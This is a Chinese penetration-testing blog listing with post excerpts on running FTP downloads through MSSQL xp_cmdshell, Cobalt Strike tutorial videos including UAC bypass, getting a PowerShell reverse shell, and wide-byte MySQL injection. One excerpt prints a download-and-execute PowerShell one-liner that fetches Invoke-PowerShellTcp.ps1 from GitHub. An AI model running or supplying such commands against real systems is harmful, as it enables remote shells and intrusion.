渗透周边

Mssql的xp_cmdshell组件执行FTP命令

Mssql的xp_cmdshell组件执行FTP命令

lsh4ck 7年前 967 0

情况较为特殊,只有目录C:\Windows\Temp\,有上传权限: 这里下载的文件默认下载到c:\user\你当前用户名 目录下方,但是这个目录没可写。即便下载了也没戏,因为根本没存进去。 于是接着执行,(先cd到可执行目录,然后在执行ftp,这样就下载到了指定的目录。) cd...

Cobalt strike中文翻译视频教程

Cobalt strike中文翻译视频教程

lsh4ck 7年前 888 0

Cobalt Strike CNA - Eventvwr UAC Bypass.mp4 Cobalt Strike 内网跨网段渗透测试.mp4 Cobalt Strike教程九:Metasploit框架.mp4 Cobalt Strike教程十三:bypassuac攻击.mp4 ...

Get shell By Powershell

Get shell By Powershell

lsh4ck 7年前 292 0

Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...

8、利用宽字节特性注入mysql

8、利用宽字节特性注入mysql 12

lsh4ck 7年前 260 0

因为手里暂时也没什么现成的实际案例,所以就暂时先用demo简单演示下完整的宽字节注入流程,虽然是本地环境,但跟实战中其实并没太大差别,大家大可不用太过纠结,宽字节注入原型代码,如下: 当我们尝试经典的‘,一眼望去,貌似什么都没发生,把sql打出来sql才知道,原来’已经被adds...

扫一扫二维码分享